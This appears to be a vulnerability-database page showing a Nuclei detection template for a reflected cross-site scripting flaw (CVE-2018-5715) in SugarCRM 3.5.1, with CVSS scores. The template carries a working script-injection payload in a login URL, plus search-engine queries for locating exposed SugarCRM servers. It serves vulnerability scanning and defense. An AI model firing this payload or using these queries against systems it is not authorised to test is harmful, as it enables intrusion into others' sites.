Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2018-5715
HistoryApr 24, 2022 - 1:39 p.m.

SugarCRM 3.5.1 - Cross-Site Scripting

2022-04-2413:39:12
ProjectDiscovery
github.com
7

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

48.0%

SugarCRM 3.5.1 is vulnerable to cross-site scripting via phprint.php and a parameter name in the query string (aka a $key variable).

id: CVE-2018-5715

info:
  name: SugarCRM 3.5.1 - Cross-Site Scripting
  author: edoardottt
  severity: medium
  description: SugarCRM 3.5.1 is vulnerable to cross-site scripting via phprint.php and a parameter name in the query string (aka a $key variable).
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Upgrade to a patched version of SugarCRM or apply the necessary security patches provided by the vendor.
  reference:
    - https://www.exploit-db.com/exploits/43683
    - https://m4k4br0.github.io/sugarcrm-xss/
    - https://www.exploit-db.com/exploits/43683/
    - https://nvd.nist.gov/vuln/detail/CVE-2018-5715
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2018-5715
    cwe-id: CWE-79
    epss-score: 0.00129
    epss-percentile: 0.46737
    cpe: cpe:2.3:a:sugarcrm:sugarcrm:3.5.1:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: sugarcrm
    product: sugarcrm
    shodan-query:
      - http.html:"SugarCRM Inc. All Rights Reserved"
      - http.title:sugarcrm
      - http.html:"sugarcrm inc. all rights reserved"
    fofa-query:
      - body="sugarcrm inc. all rights reserved"
      - title=sugarcrm
    google-query:
      - intext:"SugarCRM Inc. All Rights Reserved"
      - intitle:sugarcrm
      - intext:"sugarcrm inc. all rights reserved"
  tags: cve2018,cve,sugarcrm,xss,edb

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?action=Login&module=Users&print=a&%22%2F%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '&"/><script>alert(1)</script>=&"><< Back</a><br><br>'

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100b780d8c45ba055df31c09d04de06240306453410047933d85e4f505699fd01d402200122df5f99477736773e5576da22e81ec6df51d077454280b1a791891a62cb22:922c64590222798bb761d5b6d8e72950

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

48.0%